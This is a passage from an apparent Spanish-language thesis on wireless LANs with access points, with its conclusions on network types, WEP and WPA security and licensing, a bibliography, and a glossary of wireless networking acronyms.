en las computadoras involucradas, hacer una pequeña configuración y listo. Esto quiere
decir que instalar una red inalámbrica era un proceso mucho más rápido y flexible que
instalar una red cableada.

Una vez instalada la red inalámbrica, su utilización es prácticamente idéntica a la red


inalámbrica. Las computadoras que forman parte de la red pueden interactuar entre si y
compartir toda clase de recursos. Se pueden compartir archivos, directorios, impresoras,
unidades de disco, acceso a otras redes, internet. Para el usuario en general no hay
diferencia entre estar conectado a una red cableada o a una red inalámbrica.

Las redes inalámbricas se pueden clasificar básicamente en cuatro tipos: redes de área
personal que tienen una cobertura de menos de 10 metros, redes de área local que dan
cobertura a un edificio o hasta un campus, redes de área metropolitana que dan cobertura a
una ciudad o hasta una región. Y por último las redes de área extensa que dan cobertura a
todo un país, continente y en un caso más extremo a todo el mundo, como es el caso de la
telefonía celular. Las redes inalámbricas tienen ventajas más flexibles, en este caso serian la
parte del los cables ya que no es necesario instalarlos, es suficiente con nuestra red
inalámbrica para tener una comunicación entre los equipos de computo y tener expansión
sin necesidad de cambiar la infraestructura del inmueble, solo es necesario que la
computadora que deseamos que se agregue a la red tenga un adaptador WiFi, y configurarla
para que tenga acceso a la red.

REDES WLAN CON ACCESS POINT 184


Otra ventaja que es exclusiva de las redes inalámbricas es que los equipos formen parte de
las redes inalámbricas WiFi y así tengan movilidad para poder desplazarse el cualquier
lugar del edificio con su laptop (tomando en cuenta que estén dentro de la cobertura de la
red). Las redes inalámbricas pueden estar conectadas con redes cableadas, así que puede
solucionar el problema de expansión de una red cableada donde sea imposible tener
cableado.

Ya vimos que las redes inalámbricas pueden ser la solución para diversas situaciones,
también tienen sus desventajas en comparación con las redes cableadas, a continuación se
mencionaran algunos ejemplos. En esta caso sería la interferencia que pueden provocar
algunos equipos que trabajen en la misma frecuencia de operación y algunos obstáculos que
puedan interrumpir la comunicación entre los equipos de red que son por medio de ondas
electromagnéticas, pero la desventaja más grave a la que aun nos enfrentamos es la
seguridad, ya que es muy fácil que una persona que tenga una computadora con un
adaptador de red, pueden acceder a la red y causar un daño a algún equipo o hasta las
propias bases de datos o información privada ya sea de una empresa o personal.

O en su caso simplemente disfrutar de la conexión a internet, ya que existen personas que


tienen esta capacidad o conocimientos para adivinar las claves (hackers). Debido a que se
descubrieron muchas vulnerabilidades con el uso de WEP el IEEE se dio a la tarea de
elaborar el WPA, el cual es mucho más seguro que el WEP.

En vez de usar el algoritmo de encriptación RC4. Uno de los puntos en los cual WPA
mejora a la WEP son los siguientes:

• Tiene una mejora notable para la identificación de autentificación.


• La encriptación de la llave es más difícil que romper.
• Las llaves de encriptación cambian constantemente debido al protocolo TKIP.

REDES WLAN CON ACCESS POINT 185


Aunque actualmente se está trabajando para que puedan ofrecer seguridad semejante a las
redes alámbricas. El punto de acceso es el centro de las comunicaciones de la mayoría de
redes inalámbricas, el punto de acceso no solo es el medio de intercomunicación de todas
las terminales inalámbricas, sino que también es el puente de interconexión con la red fija e
internet. Un único punto de acceso puede soportar un pequeño grupo de usuarios y puede
funcionar en un rango de al menos treinta metros y hasta varios cientos, el objetivo
principal de los puntos de acceso es comunicarse de las vías radio, ya que se utilizan ondas
de radio para llevar información de un punto a otro sin necesidad de un medio físico
guiado.

Por tanto llegamos a la conclusión que las redes inalámbricas pueden tener mucho auge en
nuestro país debido a la necesidad de movimiento que se requiere en la industria, esta
tecnología puede ser utilizada junto con los lectores ópticos en el área del calzado en
nuestra localidad, para controlar la producción de calzado, para determinar exactamente en
donde ha habido retrasos y de esa manera poder atacarlos inmediatamente y no detener la
producción.

La tecnología óptica se puede considerar que es la más práctica y fácil de implementar pues
para la tecnología de radio se deben de pedir licencias de uso del espacio a la S.C.T. o de lo
contrario se puede infringir la Ley, con respecto a esto la S.C.T. debe de tener bastante
trabajo pues en grandes ciudades, como el D.F., en donde el espacio de radio está muy
saturado por frecuencias de radio AM y FM, comunicación empresarial, etc. Debemos de
tener cuidado si se desea comprar el hardware para realizar una red inalámbrica de
tecnología de Radio, pues debemos de estar seguros que ya cuente con la aprobación de la
S.C.T.

REDES WLAN CON ACCESS POINT 186


BIBLIOGRAFÍA

LIBROS

Roldan Martínez David, Comunicaciones inalámbricas un enfoque aplicado, Editorial


Alfaomega, México, Mayo 2005.

J. Bigelow Stephen, Localización de. Averías, Reparación, Mantenimiento y


Optimización de Redes, Editorial Me Graw Hill, España, 2003.

Carballar Falcón José Antonio, WiFi Cómo Construir una Red Inalámbrica, Editorial
Alfaomega, México, 2005.

Nichols Roldall K y Lekkas Panos C, Serie de Telecomunicaciones, seguridad para redes


inalámbricas, Editorial Me Graw Hill, España, 2006.

Gralla Presión, Como Funcionan las Rredes Iinalámbricas, Editorial Anaya,


España, 2007.

Tanenbaum, Andrew S, Redes de Computadoras, Editorial Pearson Educación, México


2003.

Stewart S. Miller, Seguridad en WiFi, Editorial Me Graw Hill, España 2002.

MANUALES

Brian Hill, Manual de Referencia Cisco, Editorial Me Graw Hill, México, 2002.

Neil Reid y Ron Seide, Manual de Redes Inalámbricas, Editorial Me Graw Hill, México,
2005.

REDES WLAN CON ACCESS POINT 187


CONSULTA EN INTERNET

http://wi-fiplanet.com/ 25/Agosto/10

http://www.ctf.gob.mx/cofetel/experiencia.shtml 28/Agosto/10

www.cisco.com 3/Septiembre/10

http://www.wifialliance.com/ 5/Septiembre/10

http://www.linksys.com.mx/ 19/Septiembre/10

http://www.mundowireless.com/ 25/Septiembre/10

http://www.superinventos.com./wifi.htm 14/Octubre/10

http://www.wi-fi.org/ 27/Octubre/10

http://es.wikipedia.org/wiki/Wi-Fi 08/Noviembre/10

http://www.aulaclic.es/articulos/wifi.html 10/Noviembre/10

REDES WLAN CON ACCESS POINT 188


GLOSARIO

ACKNOWLEDGEMENT Tipo de mensaje que se envía para indicar que un bloque de


datos ha llegado a su destino sin errores. Un acuse de recibo puede también ser negativo
(no acknowledgement-NOACK), es decir, indicar que un bloque de datos no ha llegado a
su destino.

AD HOC Topología de redes LAN que consiste en un grupo de equipos que se comunican
cada uno directamente con los otros a través de las señales de radio sin usar-un punto de
acceso.

ADSL (Asymmetric Digital Subscriber Une) Línea de Abonado Digital Asimétrica.


Consiste en una línea digital de alta velocidad, apoyada en el par simétrico de cobre que
lleva la línea, telefónica convencional o línea de abonado. Es una tecnología de acceso a
Internet de banda ancha, lo que implica capacidad para transmitir más datos, lo que, a su
vez, se traduce en mayor velocidad. Esto se consigue mediante la utilización de una banda
de frecuencias más alta que la utilizada en las conversaciones telefónicas convencionales
(300 - 3.400 Hz) por lo que, para disponer de ADSL, es necesaria la instalación de un filtro
(llamado splitter o discriminador) que se encarga de separar la señal telefónica
convencional de la que usaremos para conectarnos con ADSL. En una línea ADSL se
establecen tres canales de comunicación, que son el de envío de datos, el de recepción de
datos y el de servicio telefónico normal.

REDES WLAN CON ACCESS POINT 189


AES Estándar de cifrado avanzado, también conocido como "Rijndael", algoritmo de
encriptación simétrica de 128 bit desarrollado por los belgas Joan Daemen y Vincent
Rijmen. En Octubre de 2000 era seleccionado por el Instituto Nacional de Estándares y
Tecnología (NIST) norteamericano como estándar de cifrado reemplazando al hasta
entonces estándar DES.

AP (Access Point) Punto de Acceso. En redes de computadoras es un dispositivo que


interconecta dispositivos de comunicación inalámbrica para formar una red inalámbrica.
Normalmente un WAP también puede conectarse a una red cableada, y puede transmitir
datos entre los dispositivos conectados a la red cableada y los dispositivos inalámbricos.
Muchos WAPs pueden conectarse entre sí para formar .una red aún mayor, permitiendo
realizar "roaming". (Por otro lado, una red donde los dispositivos cliente se administran a sí
mismos, sin la necesidad de un punto de acceso se convierte en una red ad-hoc). Los puntos
de acceso inalámbricos tienen direcciones IP asignadas, para poder ser configurados. Son
los encargados de crear la red, están siempre a la espera de nuevos clientes a los que dar
servicios. El punto de acceso recibe la información, la almacena y la transmite entre la
WLAN (Wireless LAN) y la LAN cableada. Un único punto de acceso puede soportar un
pequeño grupo de usuarios y puede funcionar en un rango de al menos treinta metros y
hasta varios cientos. Este o su antena son normalmente colocados en alto pero podría
colocarse en cualquier lugar en que se obtenga la cobertura de radio deseada.

ATM (Asynchronous Transfer Mode) Modo de Transferencia Asíncrona. Estándar que


define la conmutación de paquetes (cells, celdas o células) de tamaño fijo con alta carga,
alta velocidad (entre 1.544 Mbps y 1.2 Gbps) y asignación dinámica de ancho de banda.
ATM es conocido también como paquete rápido (fast packet). No confundir con Automatic
Teller Machine (cajero automático).

REDES WLAN CON ACCESS POINT 190


B

BLUETOOTH Estándar de comunicación inalámbrica que utiliza FHSS, capaz de


transmitir a velocidades de 1 Mbps a una distancia de 10 metros entre aparatos
(normalmente portátiles, impresoras, monitores, teclados, ratones, etc.) que implementen
esta tecnología ya que su FHSS/Hopping Pattern es de 1600 veces por segundo, lo que
asegura transmisiones altamente seguras. En cuanto a su implementación Bluetooth utiliza
el término piconet. Un piconet es un grupo de 2 u 8 aparatos que utilizan "Bluetooth" que
comparten el mismo rango que es utilizado por un "Hopping Sequence", a su vez cada
piconet contiene un aparato principal ("master") que es el encargado de coordinar el
"Hopping Pattern" del piconet para que los demás aparatos ("slaves") sean capaces de
recibir información.

BPSK (Binary Phase-Shift Keying) Modulación Binaria por Salto de Fase. Es una técnica
digital de la modulación de la frecuencia usada para enviar datos sobre una red del cable
coaxial. Este tipo de modulación es menos eficiente, pero también menos susceptible ruido
que técnicas similares de la modulación, tales como QPSK y 64QAM.

BRIDGE Elemento que posibilita la conexión entre redes físicas, cableadas o inalámbricas,
de igual o distinto estándar

BSS (Basic Service Set) Conjunto de Servicios Básicos. El modo BSS es el que se utiliza
normalmente. Este modo también se denomina modo infraestructura. En esta configuración
se conectan un determinado número de puntos de acceso a una red cableada. Cada red Cada
red "wireless" "posee su propio nombre. Este nombre es el SSID de la red. Los clientes
"wireless" se conectan a estos puntos de acceso. El estándar IEEE 802.11 define el
protocolo que se utiliza para realizar esta conexión. Un cliente "wireless" puede asociarse
con una determinada red "wireless" especificando el SSID. Un cliente "wireless" también
puede asociarse a cualquier red que se encuentre disponible; basta con no especificar
ningún SSID.

REDES WLAN CON ACCESS POINT 191


BSSID (Basic Service Set Identifier) Identificador Básico del Conjunto de Servicios. Un
identificador determinado del servicio (SSID) es una secuencia de caracteres que nombra
únicamente una red de área local sin cables (WLAN). Este nombre permite que las
estaciones conecten con la red deseada cuando las redes independientes múltiples
funcionan en la misma área física. Cada sistema de dispositivos sin cables que se
comunican directamente con uno a se llama un sistema del servicio básico (BSS). Varios
BSSs se puede ensamblar junto al segmento lógico de la forma una WLAN, referido como
un sistema extendido del servicio (ESS). Un servicio Identifer determinado (SSID) es
simplemente el nombre alfanumérico del octeto 1-32 dado a cada ESS.
BWA (Broadband Wireless Access) Acceso inalámbrico de banda ancha.

CA (Colusión Avoidance) Evitación de Colisión.

CCA (Olear Channel Assessment) Valoración de la Disponibilidad del Canal.

CCK (Complementary Code Keying) Modulación de Código Complementario.

CD (Colusión Detection) Detección de Colisión.

CDMA (Code División Múltiple Access) Acceso Múltiple por División de Código.

CEPT (Conference of European Posts and Telecommunications) Conferencia de Correos y


Telecomunicaciones Europeas.

CSD (Circuit Switched Data) Conmutación de Circuitos de Datos.

CSMAICD (Carrier Sen se Múltiple Access with Colusión Detection) Acceso


Múltiple por Detección de Portadora con Detección de Colisión).

REDES WLAN CON ACCESS POINT 192


CTS (Clear to Send) Listo para Enviar.

DCF (Distributed Coordination Function) Función de Coordinación Distribuida.

DCS (Digital Cordless Estándar) Estándar Inalámbrico digital.

DECT (Digital Enhanced Cordless Telecommunications) Telecomunicaciones Digitales


Inalámbricas Mejoradas.

DECT MMC (DECT Multimedia Consortium) Consorcio DECT Multimedia.

DMAP (DECT Multimedia Access Profile) Perfil de Acceso DECT Multimedia.

DSSS (Direct Sequence Spread Spectrum) Espectro Expandido por Secuencia Directa.

EDGE (Enhanced Data Rates for GSM Evolution) 'Velocidades Mejoradas de Datos para
la Evolución de GSM.

ESS (Extended Service Set) Conjunto de Servicios Extendido.

ETSI (European Telecommunications Standards Institute) Instituto Europeo de


Normalización en Telecomunicaciones.

REDES WLAN CON ACCESS POINT 193


ETSI/BRAN (European Telecommunications Standards Institute / Broadband Radio Área
Network) Instituto Europeo de Normalización en Telecomunicaciones / Redes vía radio de
banda ancha.

FFT (Fast Fourier Transform) Transformada Rápida de Fourier.

FHSS (Frequency Hopping Spread Spectrum) Espectro Expandido por alto de Frecuencia.

FPLMTS (Future Public Land Mobile Telecommunications System) Futuro Sistema


Público de Telecomunicaciones Móviles Terrestres.

Gateway (Pasarela).

GFSP (Gaussian Frecuency-Shifi Keying) Modulación Gausiana por Salto de Frecuencia.

GPRS (General Packet Radio Service) Servicio General de Radio Paquetes.

GSM (Global System for Mobile Communications) Sistema Global para Comunicaciones
Móviles. GSM, UMTS, Wi-Fi, Bluetooth, Dect, GPRS, 3G, LMDS, etc.

HHPC (HandHeld PC) PC de mano.

HiperLAN (High-PerformanceRadio Local Área Network) Red de Área Local de Radio de


Alto Rendimiento.

REDES WLAN CON ACCESS POINT 194


HomeRF Home Radio Frequency) Radiofrecuencia del Hogar.

HR (High Rate) Alta Velocidad.

IANA (Internet Assigned Numbers Authority) Autoridad de Números Asignados de


Internet.

IAPP (Interaccess Point Protocol) Interoperatividad entre puntos de acceso.

IBSS (Independent Basic Service Set) Conjunto de Servicios Básicos independientes. El


modo IBSS, también conocido como modo ad-hoc, se ha diseñado para facilitar las
conexiones punto a punto. En realidad existen dos tipos distintos de modos ad-hoc. Uno es
el modo IBSS, también conocido como modo ad-hoc o modo ad-hoc del IEEE. Este modo
se encuentra especificado en el estándar IEEE 802.11. El segundo tipo se denomina modo
ad-hoc de demostración o modo ad-hoc de Lucent (y algunas veces, también se le llama
simplemente modo ad-hoc, lo cual es bastante confuso). Este es el modo de funcionamiento
antiguo, anterior al estándar 802.11, del modo ad-hoc debería utilizarse sólo en
instalaciones propietarias. No profundizaremos más sobre estos modos de funcionamiento.

IEEE (Institute of Electrical and Electronics Engineers) Instituto de Ingenieros Eléctricos


y Electrónicos.

IMT (International Mobile Communicactions) Comunicaciones Móviles Internacionales.

Inmarsat (International Maritime Satellite System) Sistema Internacional de


Comunicaciones Marítimas por Satélite.

IP (Internet Protocol) Protocolo de Internet.

REDES WLAN CON ACCESS POINT 195


IrCOMM (Infrared SeriallParallelPort Emulation) Emulador Infrarrojo de Puerto Serial
Paralelo.

IrDA (Infrared Data Association) es una asociación que tiene como objetivo crear y
promover el uso de sistemas de comunicaciones por infrarrojo. Actualmente tiene creados
dos estándares:

IrLAN (Infrared Local Área Network Connectivity) Conectividad de Red de Área Local
con Infrarrojo.
IrMC (Infrared Mobile Communications) Comunicaciones Móviles con Infrarrojo.

IrTran-P (Infrared Digital Image Transfer) Transferencia de Imagen Digital con


Infrarrojo.

ISA (Industry Standard Architecture) Arquitectura Normalizada de la Industria.

ISO (International Standards Organization).

ITU (International Telecommunications Union) Unión Internacional de


Telecomunicaciones.

LLC (Logical Link Control) Control del enlace lógico.

LMDS (Local Multipoint Distribution Service) Servicio Local de Distribución


Multipunto.

REDES WLAN CON ACCESS POINT 196


M

MAC (Médium Access Control) Control de Acceso al Medio.

MDG (Mobile Data Gateway) Pasarela de Datos Móviles.

MIB (Management Information Base) Base de Datos de la Información de


Gestión.

MLME (MAC Layer Management Entity) Entidad de Gestión de la Capa MAC.

MMAC (Mobile Multimedia Access Communication) Comunicaciones Multimedia de


Acceso Móvil.

MPDU (MAC profocol data unit) Unidad de Datos del Protocolo MAC. MSDU (MAC
Sen/ice Data Unit) Unidad de Datos del Servicio MAC.

N-AMPS (Narrowband Advanced Mobile Phone System) Sistema de telefonía móvil de


banda estrecha.

Network Ñame ('Nombre de Red' en inglés).

NIC (Network Inteiface Cards) Tarjetas Interfaces de Red.

NMT (Nordic Mobile Telephones) Teléfonos móviles Nórdicos.

NTT (Nippon Telegraph and Telephone) Telégrafos y teléfonos de Japón.

REDES WLAN CON ACCESS POINT 197


O

OFDM (Orthogonal Frequency División Multiplexing) Multiplexación Ortogonal por


División de Frecuencias.

OSI (Open Systems Interconnection) Interconexión de sistemas abiertos.

PC (Point Coordinator) Coordinador del punto.

PCF (Point Coordination Function) Función de Coordinación del Punto.

PCI (Peripheral Components Interconnect,) Interconexión de Componentes


Periféricos.

PCMCIA (Personal Computer Memory Card International Association) Asociación


Internacional de Tarjetas de Memoria para Ordenadores Portátiles.

PCS (Personal Communications Sen/ice) Servicio de Comunicaciones Personales.

PDA (Personal Digital Assistant) Asistentes Digitales Personales.

PDC (Personal Digital Cellular) Celular Digital Personal.

PHS (Personal Handy System) Sistema Personal Manejable.

PHY (Physical Layer) Capa Física.

REDES WLAN CON ACCESS POINT 198


PLCP (Physical Layer Convergence Procedure) Procedimiento de Convergencia de la
Capa Física.

PLME (PHY Layer Management Entity) Entidad de Gestión de la Capa Física.

Plug&Play Se denomina así a los dispositivos que solo se conectan a la computadora y


empiezan a funcionar sin necesidad de un controlador.

PMD (Physical Médium Dependent) Dependiente del Medio Físico.

PPC (PocketPC) PC de bolsillo.

PPP (Point-to-Point Protocol) Protocolo Punto-a-Punto.

QoS (Quality of Services) Calidad de servicio.

QPSK (Quadrature Phase-Shifi Keying) Modulación por Salto de Fase en


Cuadratura.

RTS (Request to Send) Solicitud para enviar.

SAR (Segmentation and Reassembly) Segmentación y Re-ensamblado. SMS (Short


Message Service) Servicio de Mensajes Cortos.

REDES WLAN CON ACCESS POINT 199


SNMP (Simple Network Management Protocol) Protocolo Simple de Gestión de Red.

SSID (Service Set Identifier) Identificador del Conjunto de Servicios.

SWAP (Shared Wireless Access Protocol) Protocolo de Acceso Compartido


Inalámbrico.

TACS (Total Access Communications System) Sistema de Comunicaciones de Acceso


Total.

TDMA (Time Division Multiple Access) Acceso Múltiple por División del Tiempo.

TD-SCDMA (Time División - Synchronous Code División Múltiple Access) División de


Tiempo - Acceso Múltiple Asincrono por División de Código.

TKIP (Temporal Key Integrity Protocol) Protocolo de Integridad de Clave


Temporal.

TOKENBUS Red de área local en bus con paso de testigo.

TOKENRING Red de área local en anillo con paso de testigo.

UMTS (Universal Mobile Telecommunications System) Sistema Universal de


Telecomunicaciones Móviles.

REDES WLAN CON ACCESS POINT 200


URI (Universal/Uniform Resource Identifier) Identificador Universal/Uniforme de
Recursos.

USB (Universal Serial Bus) Bus Serie Universal.

VESA (Video Electronics Standard Association) Asociación para la Normalización de la


Electrónica de Vídeo.

VHS de vídeo o del sistema GSM de comunicaciones móviles.

WAE (Wireless Application Environment) Entorno Inalámbrico de Aplicación.

WAP (Wireless Application Protocol) Protocolo Inalámbrico de Aplicación.

WARCHALKING Ataque a Redes Inalámbricas, es la práctica de dibujar en paredes o


aceras una serie de símbolos para indicar a otros la proximidad de un acceso inalámbrico.

WARDRIVING Ataque a Redes Inalámbricas, técnica difundida donde individuos


equipados con material apropiado (dispositivo inalámbrico, antena, software de rastreo y
unidad GPS) tratan de localizar en coche puntos wireless. Existen otras modalidades
dependiendo de cómo se realice el rastreo: a pie, bicicleta, patines, etc.

WCDMA (Wideband COMA) COMA de Banda Ancha.

WDP (Wireless Datagram Protocol) Protocolo Inalámbrico de Datagramas.

REDES WLAN CON ACCESS POINT 201


WECA (Wireless Ethernet Compability Alliance) Alianza de Compatibilidad Ethernet
Inalámbrica. Es una empresa creada en 1999 ron el fin de fomentar la compatibilidad entre
tecnologías Ethernet inalámbricas bajo la norma 802.11 del IEEE. WECA cambió de
nombre en 2003, pasando a denominarse WiFi Alliance. Los productos compatibles,
certificados por WiFi Alliance, deben llevar su logotipo.

WEP (Wired Equivalent Privacy) Protocolo para la transmisión de datos "segura". La


encriptación puede ser ajustada a 128 bits, 64 bits o deshabilitada. La configuración de 128
bits da el mayor nivel de seguridad. También hay que recordar que todas las estaciones que
necesiten comunicarse deben usar la misma clave para generar la llave de encriptación.
Actualmente hay más niveles de WEP: 152, 256 y hasta 512 bits, cuanto más alto es este
dato, supuestamente la comunicación es más segura, a costa de perder rendimiento en la
red.

WiFi (Wireless Fidelity) Abreviatura de Wireless Fidelity. Es el nombre "comercial" con


que se conoce a todos los dispositivos que funcionan sobre la base del estándar 802.11 de
transmisión inalámbrica. En lenguaje popular: Redes WiFi.

WiMAX (Worldwide Interoperability for Microwave Access) Interoperatividad


mundial para accesos de microondas.

WLAN (Wireless Local Área Network) Redes Inalámbricas de Área Local.

WMAN (Wireless Metropolitan Área Network) Redes inalámbricas de área metropolitana.

WPA (WiFi Protected Access) Acceso WiFi protegido; Estándar WiFi, aprobado en abril
de 2003, desarrollado para mejorar las características de seguridad del estándar WEP, pero
la tecnología incluye dos mejoras con respecto a este último: emplea el protocolo de
integridad de claves TKIP y la autenticación de usuarios se realiza mediante el protocolo
EAP.

REDES WLAN CON ACCESS POINT 202


WPAN (Wireless Personal Área Network) Redes inalámbricas de área personal.

WSP (Wireless Session Protocol) Protocolo Inalámbrico de Sesión.

WTLS (Wireless Transport Layer Security) Capa de Seguridad de Transporte Inalámbrico

WTP (Wireless Transaction Protocol) Protocolo Inalámbrico de Transacciones.

REDES WLAN CON ACCESS POINT 203

You might also like